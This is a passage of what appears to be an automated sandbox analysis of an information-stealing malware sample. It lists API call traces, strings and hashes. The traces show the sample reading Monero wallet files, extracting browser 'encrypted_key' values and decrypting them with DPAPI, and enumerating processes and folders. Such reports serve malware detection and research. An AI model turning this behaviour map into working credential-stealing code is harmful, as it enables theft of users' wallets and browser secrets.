                                  • lstrlen.KERNEL32(00000000), ref: 0023D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0023DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 3c3b2d18fe611926dd4c06a428a7cab772ed74a5900d95a9687d767e037e382d
                                  • Instruction ID: 3e478d0f64eb7ad0ceedc1abe4662a1bca3431b110acff430731df85930b9327
                                  • Opcode Fuzzy Hash: 3c3b2d18fe611926dd4c06a428a7cab772ed74a5900d95a9687d767e037e382d
                                  • Instruction Fuzzy Hash: 6D8101729701149BEB08FBA0DC96EEE7339EF54304F514528F407A6091EF346A69CF66
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00251580,00250D92), ref: 0023F54C
                                  • lstrlen.KERNEL32(00000000), ref: 0023F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: ba0ef2dd1a8a09cb1fec8c172fc4b12976aed9c255ad5a868c181b6ed3439efe
                                  • Instruction ID: 14ca25bbcfe5d099ef4c0679acfad678915c93eda2afc81a91c2839fde35acaa
                                  • Opcode Fuzzy Hash: ba0ef2dd1a8a09cb1fec8c172fc4b12976aed9c255ad5a868c181b6ed3439efe
                                  • Instruction Fuzzy Hash: D251F271D60108AAEB1CFBA4DC96DED7378EF54304F508528F81667191EE346A29CFA2
                                  Strings
                                  • s$, xrefs: 00247111
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0024718C
                                  • s$, xrefs: 002472AE, 00247179, 0024717C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: s$$s$$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 3722407311-2095441424
                                  • Opcode ID: a6dc1a5d853e3a1da86c420f0899ee3d32f505c16c68e0d97fe2ebff1a4131b3
                                  • Instruction ID: 9b584d038e8d304aff445bca8aa6697dcbfc8bcee7d1e9bb67f323b906ea1b37
                                  • Opcode Fuzzy Hash: a6dc1a5d853e3a1da86c420f0899ee3d32f505c16c68e0d97fe2ebff1a4131b3
                                  • Instruction Fuzzy Hash: 33518DB0D642199FDB28EFA0DC82BEEB374AF44304F1041A8E51976181EB746E98CF59
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: a996b4bd8269538f7623919f0de0bf648719d225caa8fbfc96db84ac05ab4e2e
                                  • Instruction ID: 54aaedba3149478c7dc702dbece9c2f1db805f30f2ca5db719e51dccaec6e31c
                                  • Opcode Fuzzy Hash: a996b4bd8269538f7623919f0de0bf648719d225caa8fbfc96db84ac05ab4e2e
                                  • Instruction Fuzzy Hash: 38414171D20109AFDB08EFE4DC85AEEB778AF54304F008418E41676291DB75AA29CFA6
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00239D39
                                    • Part of subcall function 00239AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239AEF
                                    • Part of subcall function 00239AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00234EEE,00000000,?), ref: 00239B01
                                    • Part of subcall function 00239AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239B2A
                                    • Part of subcall function 00239AC0: LocalFree.KERNEL32(?,?,?,?,00234EEE,00000000,?), ref: 00239B3F
                                    • Part of subcall function 00239B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00239B84
                                    • Part of subcall function 00239B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00239BA3
                                    • Part of subcall function 00239B60: LocalFree.KERNEL32(?), ref: 00239BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 658aac05c99212bc8a921ddd780a9bb1fceeb04ac83c6c50613061798e2280c2
                                  • Instruction ID: e9c8a536becc9f21d4483827e0c896077b20ca2db76fb8c3ce1b20edcdd767eb
                                  • Opcode Fuzzy Hash: 658aac05c99212bc8a921ddd780a9bb1fceeb04ac83c6c50613061798e2280c2
                                  • Instruction Fuzzy Hash: 5F3181B6D2010DABCF04EFE4DC86AEFB7B8AF49704F144558E905A7241E7709A64CBA1
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,002505B7), ref: 002486CA
                                  • Process32First.KERNEL32(?,00000128), ref: 002486DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 002486F3
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • CloseHandle.KERNEL32(?), ref: 00248761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: ad9aec71a67441239370ef7175fffdcf19fd4053d32737fe1b3270d87380af59
                                  • Instruction ID: d8770f57af962b44c3c540b2230e34034442847acc44230e7d824b929078bc51
                                  • Opcode Fuzzy Hash: ad9aec71a67441239370ef7175fffdcf19fd4053d32737fe1b3270d87380af59
                                  • Instruction Fuzzy Hash: F1314D71961218ABDB28EF54CC95FEEB778FF45700F1041A9E50AA21A0DB306A55CFA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00250E00,00000000,?), ref: 002479B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002479B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00250E00,00000000,?), ref: 002479C4
                                  • wsprintfA.USER32 ref: 002479F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 98875f6b379307ba82eebbf8ec4a38c5d878dfde67785ab2099f47db3a5376d4
                                  • Instruction ID: e3b7a44a621d89819cd50dd2a6451e5313c802914cec3ffc91af00949eeda088
                                  • Opcode Fuzzy Hash: 98875f6b379307ba82eebbf8ec4a38c5d878dfde67785ab2099f47db3a5376d4
                                  • Instruction Fuzzy Hash: 0A1127B2904118ABCB14DFC9DD45BBEB7F8FB8CB11F14425AF605A2280E3795950CBB5
                                  APIs
                                  • __getptd.LIBCMT ref: 0024C74E
                                    • Part of subcall function 0024BF9F: __amsg_exit.LIBCMT ref: 0024BFAF
                                  • __getptd.LIBCMT ref: 0024C765
                                  • __amsg_exit.LIBCMT ref: 0024C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0024C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 170a788a605a8a36beb0b38c90603a82581d9d9e277fed609ee1289e4223c374
                                  • Instruction ID: 77fea26fbc37bb7bb3b490894525810b3a981832ff2bd61c0c823bb7edf81c02
                                  • Opcode Fuzzy Hash: 170a788a605a8a36beb0b38c90603a82581d9d9e277fed609ee1289e4223c374
                                  • Instruction Fuzzy Hash: FEF024329367009BD76EBFBC580775E73A06F00721F314109F405A65D2DB7498708E5A
                                  APIs
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244F7A
                                  • lstrcat.KERNEL32(?,00251070), ref: 00244F97
                                  • lstrcat.KERNEL32(?,01048BA8), ref: 00244FAB
                                  • lstrcat.KERNEL32(?,00251074), ref: 00244FBD
                                    • Part of subcall function 00244910: wsprintfA.USER32 ref: 0024492C
                                    • Part of subcall function 00244910: FindFirstFileA.KERNEL32(?,?), ref: 00244943
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,00250FDC), ref: 00244971
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,00250FE0), ref: 00244987
                                    • Part of subcall function 00244910: FindNextFileA.KERNEL32(000000FF,?), ref: 00244B7D
                                    • Part of subcall function 00244910: FindClose.KERNEL32(000000FF), ref: 00244B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 4da12670366b53de949473283b6f25a5b4bfdef4b8ae2aba005d3ddfd97ca8af
                                  • Instruction ID: 4f48e08dabceaee114f4e2de8f13495cfebb41c71800dff9022da002a6153c99
                                  • Opcode Fuzzy Hash: 4da12670366b53de949473283b6f25a5b4bfdef4b8ae2aba005d3ddfd97ca8af
                                  • Instruction Fuzzy Hash: E32198B692020867C754FBB0DC46EED333CAB94301F404554B65D92181EE749AEC8F97